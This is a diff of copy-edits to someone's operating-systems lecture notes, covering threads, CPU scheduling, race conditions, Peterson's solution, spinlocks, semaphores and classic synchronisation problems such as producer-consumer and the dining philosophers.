@@ -26,92 +26,88 @@ Similar to processes, threads have:
|
||||
|
||||
The *registers*, *stack* and *state* are all specific to the registers. When a context switch occurs they must be stored in the **thread control block**.
|
||||
|
||||
Threads incur less overhead to create/terminate/switch processes. This is because the address space remains the same for threads of the same process.
|
||||
>When switching from thread A to thread B, the computer doesn't need to worry about updating the memory management unit as they're using the same memory layout.
|
||||
Threads incur less overhead to create, terminate or switch than processes. This is because the address space remains the same for threads of the same process.
|
||||
> When switching from thread A to thread B, the computer doesn't need to worry about updating the memory management unit as they're using the same memory layout.
|
||||
>
|
||||
>This makes switching threads very quick
|
||||
> This makes switching threads very quick
|
||||
|
||||
Some CPU's have direct **hardware support** for **multi-threading**.
|
||||
>With hyper threading and multi-threading, the thread's execution context isn't saved to the thread control block. Instead the CPU stops using one thread and starts using another.
|
||||
Some CPUs have direct **hardware support** for **multi-threading**.
|
||||
> With hyper threading and multi-threading, the thread's execution context isn't saved to the thread control block. Instead the CPU stops using one thread and starts using another.
|
||||
>
|
||||
>This decreases overhead as the execution context doesn't need to be saved and reloaded.
|
||||
> This decreases overhead as the execution context doesn't need to be saved and reloaded.
|
||||
|
||||
1. **Inter-thread communication** is easier and faster that **inter-process** communication (threads share memory by default)
|
||||
1. **Inter-thread communication** is easier and faster than **inter-process** communication (threads share memory by default)
|
||||
2. **No protection boundaries** are required in the address space (threads are cooperating, they belong to the same user and have the same goal)
|
||||
3. Synchronisation has to be considered carefully.
|
||||
|
||||
If you opened word and excel, you wouldn't want them running on threads as you don't want word to have access to the memory excel is accessing. However if you just had word open the spell check and graphics libraries would all run on threads as they work towards a common goal.
|
||||
If you opened Word and Excel, you wouldn't want them running on threads as you don't want Word to have access to the memory Excel is accessing. However, if you just had Word open, the spellcheck and graphics libraries would all run on threads as they work towards a common goal.
|
||||
|
||||
### Why use threads
|
||||
|
||||
1. Multiple **related activities** apply to the **same resources**, these resources should be accessible.
|
||||
2. Processes will often contain multiple **blocking tasks**
|
||||
1. I/O operations (thread blocks, interrupt marks completion)
|
||||
2. Memory access: pages faults are result in blocking
|
||||
2. Memory access: page faults result in blocking
|
||||
|
||||
Such activities should be carried out in parallel on threads. e.g. web-servers, word processors, processing large data volumes etc
|
||||
Such activities should be carried out in parallel on threads, e.g. web servers, word processors and processing large data volumes.
|
||||
|
||||
**User** threads - happen inside the user space, the OS doesn't need to do anything.
|
||||
|
||||
>**Thread management** (creating, destroying, scheduling, thread control block manipulation) is carried out in user space with the help of a user library.
|
||||
> **Thread management** (creating, destroying, scheduling, thread control block manipulation) is carried out in user space with the help of a user library.
|
||||
>
|
||||
>The process maintains a thread table managed by the run-time system without the kernel's knowledge (similar to a process table and used for thread switching)
|
||||
> The process maintains a thread table managed by the run-time system without the kernel's knowledge (similar to a process table and used for thread switching)
|
||||
|
||||
**Kernel** threads - ask the OS to create a tread for the user and give it to the user.
|
||||
**Hybrid** implementations - is what is used in windows 10
|
||||
|
||||

|
||||
**Kernel** threads - Ask the OS to create a thread for the user and give it to the user.
|
||||
**Hybrid** implementations - Used in Windows 10
|
||||
|
||||
**Pros and cons of user threads**
|
||||
|
||||
| Pros | Cons |
|
||||
| ----------- | ----------- |
|
||||
| Threads in user space don't require mode switches | Blocking system calls suspend all running threads |
|
||||
| Full control over the thread scheduler | No true parallelism (the processes still scheduled on a single CPU) |
|
||||
| OS independent | Clock interrupts (user threads are non-preemptive) |
|
||||
| Full control over the thread scheduler | No true parallelism (the process is still scheduled on a single CPU) |
|
||||
| OS-independent | Clock interrupts (user threads are non-pre-emptive) |
|
||||
| - | Page faults result in blocking the process|
|
||||
|
||||
The user threads don't share the memory management unit therefore if a thread tries to access memory that isn't loaded in the MMU then a page fault will occur, these occur often.
|
||||
The user threads don't share the memory management unit. Therefore, if a thread tries to access memory that isn't loaded in the MMU, a page fault will occur. These occur often.
|
||||
|
||||
**Kernel Threads**
|
||||
The kernel manages the threads, user application accesses threading facilities through **API** and **system calls**
|
||||
>The **thread table** is in the kernel, containing the thread control blocks.
|
||||
The kernel manages the threads. The user application accesses threading facilities through an **API** and **system calls**.
|
||||
> The **thread table** is in the kernel, containing the thread control blocks.
|
||||
>
|
||||
>If a thread blocks, the kernel chooses a thread from the same or different process.
|
||||
> If a thread blocks, the kernel chooses a thread from the same or different process.
|
||||
|
||||
Advantages:
|
||||
>**True parallelism** can be achieved
|
||||
>No run time system needed
|
||||
> **True parallelism** can be achieved
|
||||
> No run-time system needed
|
||||
|
||||
However frequent **mode switches** take place, resulting in a lower performance.
|
||||
However, frequent **mode switches** take place, resulting in lower performance.
|
||||
|
||||

|
||||
|
||||
Kernel threads are slower to create and sync that user level however user level cannot exploit parallelism.
|
||||
Kernel threads are slower to create and synchronise than user-level threads. However, user-level threads cannot exploit parallelism.
|
||||
|
||||
**Hybrid Implementation**
|
||||
>User threads are **multiplexed** onto kernel threads
|
||||
> User threads are **multiplexed** onto kernel threads
|
||||
>
|
||||
>Kernel sees and schedules the kernel threads
|
||||
> Kernel sees and schedules the kernel threads
|
||||
>
|
||||
>User application sees user threads and creates/schedules these (an unrestricted number)
|
||||
|
||||

|
||||
> User application sees user threads and creates/schedules these (an unrestricted number)
|
||||
|
||||
Thread libraries provide an API for managing threads
|
||||
Thread libraries can be implemented
|
||||
>Entirely in user space (user threads)
|
||||
> Entirely in user space (user threads)
|
||||
>
|
||||
>Based off system calls (rely on the kernel)
|
||||
> Based on system calls (rely on the kernel)
|
||||
|
||||
Examples of thread APIs include **POSIX PThreads**, windows threads and Java threads
|
||||
Examples of thread APIs include **POSIX PThreads**, Windows threads and Java threads.
|
||||
|
||||
`pthread_create` - Create new thread
|
||||
`pthread_exit` - Exit existing thread
|
||||
`pthread_join` - Wait for thread with ID
|
||||
`pthread_yield` - Release CPU
|
||||
`pthread_attr_init` - Thread Attributes (e.g. priority)
|
||||
`pthread_attr_destroy` - Release Attributes
|
||||
- `pthread_create` - Create new thread
|
||||
- `pthread_exit` - Exit existing thread
|
||||
- `pthread_join` - Wait for thread with ID
|
||||
- `pthread_yield` - Release CPU
|
||||
- `pthread_attr_init` - Thread Attributes (e.g. priority)
|
||||
- `pthread_attr_destroy` - Release Attributes
|
||||
|
||||
`$ ~ man pthread_create` returns the help page
|
||||
|
||||
|
||||
@@ -1,18 +1,15 @@
|
||||
09/10/20
|
||||
|
||||
|
||||
**Multi-level scheduling algorithms**
|
||||
>Nothing is stopping us from using different scheduling algorithms for individual queues for each different priority level.
|
||||
> Nothing is stopping us from using different scheduling algorithms for individual queues for each different priority level.
|
||||
>
|
||||
> - **Feedback queues** allow priorities to change dynamically i.e. jobs can move between queues
|
||||
1. Move to **lower priority queue** if too much CPU time is used
|
||||
2. Move to **higher priority queue** to prevent starvation and avoid inversion of control.
|
||||
> 1. Move to a **lower-priority queue** if too much CPU time is used
|
||||
> 2. Move to a **higher-priority queue** to prevent starvation and avoid inversion of control.
|
||||
|
||||
Exam 2013: Explain how you would prevent starvation in a priority queue algorithm?
|
||||
|
||||

|
||||
|
||||
The solution to this is to momentarily boost thread A's priority level, this will let A do what it what's to do and release resource X so that B and C can run.
|
||||
The solution to this is to momentarily boost thread A's priority level. This will let A do what it wants to do and release resource X so that B and C can run.
|
||||
|
||||
Priority boosting helps avoid control inversion.
|
||||
|
||||
@@ -36,16 +33,10 @@ Feedback queues are highly configurable and offer significant flexibility.
|
||||
>
|
||||
> A **round robin** is used within the queues.
|
||||
|
||||
|
||||
|
||||

|
||||
|
||||

|
||||
|
||||
If you give a couple of the threads the highest priority level, you can freeze your computer. (causes starvation for low priority threads)
|
||||
|
||||
|
||||
|
||||
<ins>**Scheduling in Linux**</ins>
|
||||
|
||||
> Process scheduling has evolved over different versions of Linux to account for multiple processors/cores, processor affinity, and **load balancing** between cores.
|
||||
@@ -59,9 +50,9 @@ If you give a couple of the threads the highest priority level, you can freeze y
|
||||
>
|
||||
> The most recent scheduling algorithm in Linux for time sharing tasks is the **completely fair scheduler**
|
||||
|
||||
**Real time FIFO** have the highest priority and are scheduled with a **FCFS approach** using a pre-emption if a higher priority job shows up.
|
||||
**Real-time FIFO tasks** have the highest priority and are scheduled with an **FCFS approach**, using pre-emption if a higher-priority job shows up.
|
||||
|
||||
**Real time round robin tasks** are preemptable by clock interrupts and have a time slice associated with them.
|
||||
**Real-time round robin tasks** can be pre-empted by clock interrupts and have a time slice associated with them.
|
||||
|
||||
Both ways *cannot* guarantee hard deadlines.
|
||||
|
||||
@@ -71,25 +62,21 @@ Both ways *cannot* guarantee hard deadlines.
|
||||
>
|
||||
> <ins>If all N processes/threads have the same priority. </ins>
|
||||
>
|
||||
> They will be allocated a time slice equal to 1/N times the available CPU time.
|
||||
> They will be allocated a time slice equal to 1/N times the available CPU time.
|
||||
>
|
||||
> The length of the **time slice** and the available CPU time are based on the **targeted latency** (every process/thread should run at least once in this time)
|
||||
>
|
||||
> If N is very large, the **context switch time will be dominant**, hence a lower bound on the time slice is imposed by the minimum granularity.
|
||||
>
|
||||
> A process/thread's time slice can be no less than the **minimum granularity.**
|
||||
> A process/thread's time slice can be no less than the **minimum granularity.**
|
||||
|
||||
A **weighting scheme** is used to take difference priorities into account.
|
||||
|
||||
<img src="assets/k.png" alt="alt text" style="zoom:60%;" />
|
||||
A **weighting scheme** is used to take different priorities into account.
|
||||
|
||||
The tasks with the **lowest proportional amount** of "used CPU time" are selected first. (Shorter tasks picked first if Wi is the same).
|
||||
|
||||
|
||||
|
||||
**Shared Queues**
|
||||
|
||||
A single of multi-level queue **shared** between all CPUs
|
||||
A single or multi-level queue **shared** between all CPUs
|
||||
|
||||
| Pros | Cons |
|
||||
| ---------------------------- | -------------------------------------------------------- |
|
||||
@@ -98,8 +85,6 @@ A single of multi-level queue **shared** between all CPUs
|
||||
|
||||
Windows will allocate the **highest priority threads** to the individual CPUs/cores.
|
||||
|
||||
|
||||
|
||||
**Private Queues**
|
||||
|
||||
> Each CPU has a private (set) of queues
|
||||
@@ -111,15 +96,15 @@ Windows will allocate the **highest priority threads** to the individual CPUs/co
|
||||
|
||||
**Related vs. Unrelated threads**
|
||||
|
||||
> **Related**: multiple threads that communicated with one another and **ideally run** together
|
||||
> **Related**: multiple threads that communicate with one another and **ideally run** together
|
||||
>
|
||||
> **Unrelated** processes threads that are **independent**, possibly started by **different users** running different programs.
|
||||
> **Unrelated**: processes or threads that are **independent**, possibly started by **different users** running different programs.
|
||||
|
||||

|
||||
|
||||
Threads belong to the same process are cooperating e.g. they **exchange messages** or **share information**
|
||||
Threads belonging to the same process are cooperating, e.g. they **exchange messages** or **share information**.
|
||||
|
||||
The aim is to get threads running as much as possible, at the **same time across multiple CPU**s.
|
||||
The aim is to get threads running as much as possible at the **same time across multiple CPUs**.
|
||||
|
||||
**Space Sharing**
|
||||
|
||||
@@ -137,5 +122,4 @@ The aim is to get threads running as much as possible, at the **same time across
|
||||
>
|
||||
> A pre-emptive algorithm
|
||||
>
|
||||
> **Blocking threads** result in idle CPU (If a thread blocks, the rest of the time slice will be unused due the time slice synchronisation across all CPUs)
|
||||
|
||||
> **Blocking threads** result in an idle CPU (if a thread blocks, the rest of the time slice will be unused due to the time slice synchronisation across all CPUs)
|
||||
@@ -29,11 +29,9 @@ int main() {
|
||||
}
|
||||
```
|
||||
|
||||
This piece of code creates two threads, and points them towards the `calc` function. The `pthread_join(tid1,NULL);` line is waiting until thread 1 is finished until the code moves on.
|
||||
This piece of code creates two threads and points them towards the `calc` function. The `pthread_join(tid1,NULL);` line waits until thread 1 has finished before the code moves on.
|
||||
|
||||
|
||||
|
||||
Counter++ consists of three separate actions.
|
||||
`counter++` consists of three separate actions.
|
||||
|
||||
1. *read* the value of counter from memory and **store it in a register**
|
||||
2. *add* one to the value in the register
|
||||
@@ -41,17 +39,11 @@ Counter++ consists of three separate actions.
|
||||
|
||||
The above actions are **not** "atomic". This means they can be interrupted by the timer.
|
||||
|
||||

|
||||
|
||||
TCB - *Thread Control Block*
|
||||
|
||||
This is what could happen if the threads are not interrupted.
|
||||
|
||||
However the thread control block could be out of date by the time the thread starts running again. For example *counter* could be 2 but the thread control block still has the old value of *counter*.
|
||||
|
||||
|
||||
|
||||
The problem is that simple instructions in c are actually multiple instructions in assembly code. Another example is `print()`
|
||||
The problem is that simple instructions in C are actually multiple instructions in assembly code. Another example is `print()`.
|
||||
|
||||
```c
|
||||
void print() {
|
||||
@@ -71,7 +63,7 @@ However, if **interleaved** like this they do interact. The global variable used
|
||||
|
||||
> Consider a **bounded buffer** in which N items can be stored
|
||||
>
|
||||
> A **counter** is maintained to count the number of items currently in the buffer. **Increment** when something is added and **decremented** when an item is removed.
|
||||
> A **counter** is maintained to count the number of items currently in the buffer. It is **incremented** when something is added and **decremented** when an item is removed.
|
||||
>
|
||||
> Similar **concurrency problems** as with the calculation of sums happen in the bounded buffer which is a consumer problem.
|
||||
|
||||
@@ -96,11 +88,11 @@ while (true) {
|
||||
}
|
||||
```
|
||||
|
||||
This is a circular queue, there's a start and end pointer (*in* and *out*). The shared counter is being manipulated from 2 different places which can go wrong.
|
||||
This is a circular queue: there's a start and end pointer (*in* and *out*). The shared counter is being manipulated from two different places, which can go wrong.
|
||||
|
||||
## Race Conditions
|
||||
|
||||
A **race conditions occurs** when multiple threads/processes **access shared data** and the result is dependent on **the order in which the instructions are interleaved**.
|
||||
A **race condition occurs** when multiple threads/processes **access shared data** and the result is dependent on **the order in which the instructions are interleaved**.
|
||||
|
||||
### Concurrency within the OS
|
||||
|
||||
@@ -137,10 +129,10 @@ A **critical section** is a set of instructions in which **shared resources** be
|
||||
Any solution to the **critical section problem** must satisfy the following requirements:
|
||||
|
||||
1. **Mutual exclusion** - only one process can be in its critical section at any one point in time.
|
||||
2. **Progress** - any process must be able to enter its critical section at some point in time. (a process/thread has a right to enter its critical section at a point in time). If there is no thread/process in the critical section there is no reason for the currently thread not to be allowed in the **critical section**.
|
||||
2. **Progress** - any process must be able to enter its critical section at some point in time. (A process/thread has a right to enter its critical section at a point in time.) If there is no thread/process in the critical section, there is no reason for the current thread not to be allowed in the **critical section**.
|
||||
3. **Fairness/bounded waiting** - fairly distributed waiting times/processes cannot be made to wait indefinitely.
|
||||
|
||||
These requirements have to be satisfied, independent of the order in which sequences are executed.
|
||||
These requirements have to be satisfied independently of the order in which sequences are executed.
|
||||
|
||||
### Enforcing Mutual Exclusion
|
||||
|
||||
@@ -157,16 +149,14 @@ A set of processes/threads is *deadlocked* if each process/thread in the set is
|
||||
|
||||
Each **deadlocked process/thread** is waiting for a resource held by another deadlocked process/thread (which cannot run and hence release the resource).
|
||||
|
||||
* Assume that X and Y are **mutually exclusive resources**.
|
||||
* Thread A and B need to **acquire both resources** and request them in oppose orders.
|
||||
|
||||

|
||||
- Assume that X and Y are **mutually exclusive resources**.
|
||||
- Threads A and B need to **acquire both resources** and request them in opposite orders.
|
||||
|
||||
**Four conditions** must hold for a deadlock to occur
|
||||
|
||||
1. **Mutual exclusion** - a resource can be assigned to at most one process at a time.
|
||||
2. **Hold and wait condition** - a resource can be held while requesting new resources.
|
||||
3. **No pre-emption** - resources cannot be forcefully taken away from a process
|
||||
4. **Circular wait** - there is a circular chain of two or more processes,, waiting for a resource held by the other processes.
|
||||
4. **Circular wait** - there is a circular chain of two or more processes waiting for a resource held by the other processes.
|
||||
|
||||
**No deadlocks** can occur if one of the conditions isn't met.
|
||||
@@ -2,15 +2,15 @@
|
||||
|
||||
## Peterson's Solution
|
||||
|
||||
**Peterson's solution** is a **software based** solution which worked well on **older machines**
|
||||
**Peterson's solution** is a **software-based** solution which worked well on **older machines**
|
||||
|
||||
Two **shared variables** are used
|
||||
|
||||
1. *turn* - indicates which process is next to enter its critical section.
|
||||
2. *Boolean flag [2]* - indicates that a process is ready to enter its critical section
|
||||
|
||||
* Peterson's solution can be used over multiple processes or threads
|
||||
* Peterson's solution for two processes satisfies all **critical section requirements** (mutual exclusion, progress, fairness)
|
||||
- Peterson's solution can be used over multiple processes or threads
|
||||
- Peterson's solution for two processes satisfies all **critical section requirements** (mutual exclusion, progress, fairness)
|
||||
|
||||
`````c
|
||||
do {
|
||||
@@ -44,15 +44,15 @@ do {
|
||||
|
||||
**Figure**: *Peterson's solution for process j*
|
||||
|
||||
Even when these two processes are interleaved, its unbreakable as there is always a check to see if the other process is in the critical section.
|
||||
Even when these two processes are interleaved, it's unbreakable as there is always a check to see if the other process is in the critical section.
|
||||
|
||||
### Mutual exclusion requirement:
|
||||
|
||||
The variable turn can have at most one value at a time.
|
||||
|
||||
* Both `flag[i]` and `flag[j]` are *true* when they want to enter their critical section
|
||||
* Turn is a **singular variable** that can store only one value
|
||||
* Hence `while (flag[i] && turn == i);` or `while (flag[j] && turn == j);` is true and at most one process can enter its critical section (mutual exclusion)
|
||||
- Both `flag[i]` and `flag[j]` are *true* when they want to enter their critical section
|
||||
- Turn is a **singular variable** that can store only one value
|
||||
- Hence `while (flag[i] && turn == i);` or `while (flag[j] && turn == j);` is true and at most one process can enter its critical section (mutual exclusion)
|
||||
|
||||
**Progress**: any process must be able to enter its critical section at some point in time
|
||||
|
||||
@@ -60,26 +60,25 @@ The variable turn can have at most one value at a time.
|
||||
>
|
||||
> If a process *j* does not want to enter its critical section
|
||||
>
|
||||
> * `flag[j] == false`
|
||||
> * `white (flag[j] && turn == j)` will terminate for process *i*
|
||||
> * *i* enters critical section
|
||||
> - `flag[j] == false`
|
||||
> - `white (flag[j] && turn == j)` will terminate for process *i*
|
||||
> - *i* enters critical section
|
||||
|
||||
### Fairness/bounded waiting
|
||||
|
||||
Fairly distributed waiting times/process cannot be made to wait indefinitely.
|
||||
Fairly distributed waiting times: processes cannot be made to wait indefinitely.
|
||||
|
||||
> If P<sub>i</sub> and P<sub>j</sub> both want to enter their critical section
|
||||
>
|
||||
> * `flag[i] == flag[j] == true`
|
||||
> * `turn` is either *i* or *j* assuming that `turn == i` *i* enters it's critical section
|
||||
> * *i* finishes critical section `flag[i] = false` and then *j* enters its critical section.
|
||||
|
||||
Peterson's solution works when there is two or more processes. Questions on Peterson's solution with more than two solutions is not in the spec.
|
||||
> - `flag[i] == flag[j] == true`
|
||||
> - `turn` is either *i* or *j*. Assuming that `turn == i`, *i* enters its critical section
|
||||
> - *i* finishes critical section `flag[i] = false` and then *j* enters its critical section.
|
||||
|
||||
Peterson's solution works when there are two or more processes. Questions on Peterson's solution with more than two processes are not in the specification.
|
||||
|
||||
**Disable interrupts** whilst **executing a critical section** and prevent interruptions from I/O devices etc.
|
||||
|
||||
For example we see `counter ++` as one instruction however it is three instructions in assembly code. If there is an interrupt somewhere in the middle of these three instructions bad things happen.
|
||||
For example, we see `counter ++` as one instruction, but it is three instructions in assembly code. If there is an interrupt somewhere in the middle of these three instructions, bad things happen.
|
||||
|
||||
```c
|
||||
register = counter;
|
||||
@@ -93,10 +92,10 @@ Disabling interrupts may be appropriate on a **single CPU machine**, not on a mu
|
||||
|
||||
> Implement `test_and_set()` and `swap_and_compare()` instructions as a **set of atomic (uninterruptible) instructions**
|
||||
>
|
||||
> * Reading and setting the variables is done as **one complete set of instructions**
|
||||
> * If `test_and_set()` / `sawp_and_compare()` are called **simultaneously** they will be executed sequentially.
|
||||
> - Reading and setting the variables is done as **one complete set of instructions**
|
||||
> - If `test_and_set()` / `sawp_and_compare()` are called **simultaneously** they will be executed sequentially.
|
||||
>
|
||||
> They are used in combination with **global lock variables**, assumed to be `true (1) ` is the lock is in use.
|
||||
> They are used in combination with **global lock variables**, assumed to be `true (1)` if the lock is in use.
|
||||
|
||||
#### Test_and_set()
|
||||
|
||||
@@ -121,8 +120,8 @@ do {
|
||||
} while (...)
|
||||
```
|
||||
|
||||
* `test_and_set()` must be **atomic**.
|
||||
* If two processes are using `test_and_set()` and are interleaved, it can lead to two processes going into the critical section.
|
||||
- `test_and_set()` must be **atomic**.
|
||||
- If two processes are using `test_and_set()` and are interleaved, it can lead to two processes going into the critical section.
|
||||
|
||||
```c
|
||||
// Compare and swap method
|
||||
@@ -146,16 +145,11 @@ do {
|
||||
} while (...);
|
||||
```
|
||||
|
||||
|
||||
|
||||
`test_and_set()` and `swap_and_compare()` are **hardware instructions** and **not directly accessible** to the user.
|
||||
|
||||
**Disadvantages**:
|
||||
|
||||
* **Busy waiting** is used. When the process is doing **nothing** just sitting in a loop, the process is still eating up processor time. If I know the process won't be **waiting for long busy waiting is beneficial** however if it is a long time a blocking signal will be sent to the process.
|
||||
* **Deadlock** is possible e.g when two locks are requested in opposite orders in different threads.
|
||||
|
||||
The OS uses the hardware instructions to implement higher level mechanisms/instructions for mutual exclusion i.e. **mutexes** and **semaphores**.
|
||||
|
||||
|
||||
- **Busy waiting** is used. When the process is doing **nothing**, just sitting in a loop, it is still eating up processor time. If I know the process won't be **waiting for long, busy waiting is beneficial**. However, if it is a long time, a blocking signal will be sent to the process.
|
||||
- **Deadlock** is possible e.g when two locks are requested in opposite orders in different threads.
|
||||
|
||||
The OS uses the hardware instructions to implement higher-level mechanisms/instructions for mutual exclusion, i.e. **mutexes** and **semaphores**.
|
||||
@@ -24,10 +24,10 @@ release() {
|
||||
}
|
||||
```
|
||||
|
||||
`acquire()` and `release()` must be **atomic instructions** .
|
||||
`acquire()` and `release()` must be **atomic instructions**.
|
||||
|
||||
* No **interrupts** should occur between reading and setting the lock.
|
||||
* If interrupts can occur, the follow sequence could occur.
|
||||
- No **interrupts** should occur between reading and setting the lock.
|
||||
- If interrupts can occur, the following sequence could occur.
|
||||
|
||||
```c
|
||||
T_i => lock available
|
||||
@@ -41,20 +41,18 @@ The process/thread that acquires the lock must **release the lock** - in contras
|
||||
| Pros | Cons |
|
||||
| ------------------------------------------------------------ | ------------------------------------------------------------ |
|
||||
| Context switches can be **avoided**. | Calls to `acquire()` result in **busy waiting**. Shocking performance on single CPU systems. |
|
||||
| Efficient on multi-core systems when locks are **held for a short time**. | A thread can waste it's entire time slice busy waiting. |
|
||||
| Efficient on multi-core systems when locks are **held for a short time**. | A thread can waste its entire time slice busy waiting. |
|
||||
|
||||

|
||||
|
||||
|
||||
|
||||
## Semaphores
|
||||
|
||||
> **Semaphores** are an approach for **mutual exclusion** and **process synchronisation** provided by the operating system.
|
||||
>
|
||||
> * They contain an **integer variable**
|
||||
> * We distinguish between **binary** (0-1) and **counting semaphores** (0-N)
|
||||
> - They contain an **integer variable**
|
||||
> - We distinguish between **binary** (0-1) and **counting semaphores** (0-N)
|
||||
>
|
||||
> Two **atomic functions** are used to manipulate semaphores**
|
||||
> Two **atomic functions** are used to manipulate semaphores.
|
||||
>
|
||||
> 1. `wait()` - called when a resource is **acquired** the counter is decremented.
|
||||
> 2. `signal()` / `post()` is called when the resource is **released**.
|
||||
@@ -108,12 +106,12 @@ Calling `wait()` will **block** the process when the internal **counter is negat
|
||||
|
||||
Calling `post()` **removes a process/thread** from the blocked queue if the counter is less than or equal to 0.
|
||||
|
||||
1. The process/thread state is changed from ***blocked** to **ready**
|
||||
2. Different queuing strategies can be employed to **remove** process/threads e.g. FIFO etc
|
||||
1. The process/thread state is changed from **blocked** to **ready**
|
||||
2. Different queuing strategies can be employed to **remove** processes/threads, e.g. FIFO
|
||||
|
||||
The negative value of the semaphore is the **number of processes waiting** for the resource.
|
||||
|
||||
`block()` and `wait()` are system called provided by the OS.
|
||||
`block()` and `wait()` are system calls provided by the OS.
|
||||
|
||||
`post()` and `wait()` **must** be **atomic**
|
||||
|
||||
@@ -139,17 +137,15 @@ Semaphores put your code to sleep. Mutexes apply busy waiting to user code.
|
||||
|
||||
Semaphores within the **same process** can be declared as **global variables** of the type `sem_t`
|
||||
|
||||
> * `sem_init()` - initialises the value of the semaphore.
|
||||
> * `sem_wait()` - decrements the value of the semaphore.
|
||||
> * `sem_post()` - increments the values of the semaphore.
|
||||
|
||||

|
||||
> - `sem_init()` - initialises the value of the semaphore.
|
||||
> - `sem_wait()` - decrements the value of the semaphore.
|
||||
> - `sem_post()` - increments the values of the semaphore.
|
||||
|
||||
Synchronising code does result in a **performance penalty**
|
||||
|
||||
> * Synchronise only **when necessary**
|
||||
> - Synchronise only **when necessary**
|
||||
>
|
||||
> * Synchronise as **few instructions** as possible (synchronising unnecessary instructions will delay others from entering their critical section)
|
||||
> - Synchronise as **few instructions** as possible (synchronising unnecessary instructions will delay others from entering their critical section)
|
||||
|
||||
```c
|
||||
void * calc(void * increments) {
|
||||
@@ -167,36 +163,34 @@ void * calc(void * increments) {
|
||||
|
||||
#### Starvation
|
||||
|
||||
> Poorly designed **queueing approaches** (e.g. LIFO) may results in fairness violations
|
||||
> Poorly designed **queuing approaches** (e.g. LIFO) may result in fairness violations
|
||||
|
||||
#### Deadlock
|
||||
|
||||
> Two or more processes are **waiting indefinitely** for an event that can be caused only by one of the waiting processes or thread.
|
||||
> Two or more processes are **waiting indefinitely** for an event that can be caused only by one of the waiting processes or threads.
|
||||
|
||||
#### Priority Inversion
|
||||
|
||||
> Priority inversion happens when a high priority process (`H`) has to wait for a **resource** currently held by a low priority process (`L`)
|
||||
> Priority inversion happens when a high-priority process (`H`) has to wait for a **resource** currently held by a low-priority process (`L`)
|
||||
>
|
||||
> Priority inversion can happen in chains e.g. `H` waits for `L` to release a resource and L is interrupted by a medium priority process `M`.
|
||||
>
|
||||
> This can be avoided by implementing priority inheritance to boost `L` to the `H`'s priority.
|
||||
|
||||
|
||||
> This can be avoided by implementing priority inheritance to boost `L` to `H`'s priority.
|
||||
|
||||
## The Producer and Consumer Problem
|
||||
|
||||
> * Producer(s) and consumer(s) share N **buffers** (an array) that are capable of holding **one item each** like a printer queue.
|
||||
> * The buffer can be of bounded (size N) or **unbounded size**.
|
||||
> * There can be one or multiple consumers and or producers.
|
||||
> * The **producer(s)** add items and **goes to sleep** if the buffer is **full** (only for a bounded buffer)
|
||||
> * The **consumer(s)** remove items and **goes to sleep** if the buffer is **empty**
|
||||
> - Producer(s) and consumer(s) share N **buffers** (an array) that are capable of holding **one item each** like a printer queue.
|
||||
> - The buffer can be of bounded (size N) or **unbounded size**.
|
||||
> - There can be one or multiple consumers and/or producers.
|
||||
> - The **producer(s)** add items and **go to sleep** if the buffer is **full** (only for a bounded buffer)
|
||||
> - The **consumer(s)** remove items and **go to sleep** if the buffer is **empty**
|
||||
|
||||
The simplest version of this problem has **one producer**, **one consumer** and a buffer of **unbounded size**.
|
||||
|
||||
* A counter (index) variable keeps track of the **number of items in the buffer**.
|
||||
* It uses **two binary semaphores:**
|
||||
* `sync` **synchronises** access to the **buffer** (counter) which is initialised to 1.
|
||||
* `delay_consumer` ensures that the **consumer** goes to **sleep** when there are no items available, initialised to 0.
|
||||
- A counter (index) variable keeps track of the **number of items in the buffer**.
|
||||
- It uses **two binary semaphores:**
|
||||
- `sync` **synchronises** access to the **buffer** (counter) which is initialised to 1.
|
||||
- `delay_consumer` ensures that the **consumer** goes to **sleep** when there are no items available, initialised to 0.
|
||||
|
||||

|
||||
|
||||
@@ -206,16 +200,14 @@ It is obvious that any manipulations of count will have to be **synchronised**.
|
||||
|
||||
> When the consumer has **exhausted the buffer** (when `items == 0`), it should go to sleep but the producer increments `items` before the consumer checks it.
|
||||
>
|
||||
> * Consumer has removed the **last element**
|
||||
> * The producer adds a **new element**
|
||||
> * The consumer should have gone to sleep but no longer will
|
||||
> * The consumer consumes **non-existing elements**
|
||||
> - Consumer has removed the **last element**
|
||||
> - The producer adds a **new element**
|
||||
> - The consumer should have gone to sleep but no longer will
|
||||
> - The consumer consumes **non-existing elements**
|
||||
>
|
||||
> **Solutions**:
|
||||
>
|
||||
> * Move the consumers' if statement inside the critical section
|
||||
|
||||
|
||||
> - Move the consumer's if statement inside the critical section
|
||||
|
||||
### Producers and Consumers Problem
|
||||
|
||||
|
||||
@@ -2,14 +2,12 @@
|
||||
|
||||
## The Dining Philosophers Problem
|
||||
|
||||
<img src="assets/w.png" alt="img" style="zoom:67%;" />
|
||||
|
||||
The problem is defined as:
|
||||
|
||||
* **Five philosophers** are sitting on a round table
|
||||
* Each one has a plate of spaghetti
|
||||
* The spaghetti is too slippery, and each philosopher **needs 2 forks** to be able to eat
|
||||
* When hungry, the philosopher tries to acquire the forks on his left and right.
|
||||
- **Five philosophers** are sitting around a round table
|
||||
- Each one has a plate of spaghetti
|
||||
- The spaghetti is too slippery, and each philosopher **needs 2 forks** to be able to eat
|
||||
- When hungry, the philosopher tries to acquire the forks on his left and right.
|
||||
|
||||
Note that this reflects the general problem of **sharing a limited set** of resources (forks) between a **number of processes** (philosophers).
|
||||
|
||||
@@ -17,15 +15,15 @@ Note that this reflects the general problem of **sharing a limited set** of reso
|
||||
|
||||
**Forks** are represented by **semaphores** (initialised to 1)
|
||||
|
||||
* 1 if the fork is available: the philosopher can continue.
|
||||
* 0 if the fork is unavailable: the philosopher goes to **sleep** if trying to acquire it.
|
||||
- 1 if the fork is available: the philosopher can continue.
|
||||
- 0 if the fork is unavailable: the philosopher goes to **sleep** if trying to acquire it.
|
||||
|
||||
Solution: Every philosopher picks up one fork and waits for the second fork to become available (without putting the first one down).
|
||||
|
||||
This solution will **deadlock** every time.
|
||||
|
||||
> * The deadlock can be avoided by exponential decay. This is where a philosopher puts down their fork and waits for a random amount of time. (this is how Ethernet systems avoid data collisions)
|
||||
> * Just **add another fork**
|
||||
> - The deadlock can be avoided by exponential decay. This is where a philosopher puts down their fork and waits for a random amount of time. (This is how Ethernet systems avoid data collisions.)
|
||||
> - Just **add another fork**
|
||||
|
||||
### Solution 2
|
||||
|
||||
@@ -33,9 +31,7 @@ This solution will **deadlock** every time.
|
||||
|
||||
*Question*: Can I initialise the value of the `eating` semaphore to 2 to create more parallelism?
|
||||
|
||||
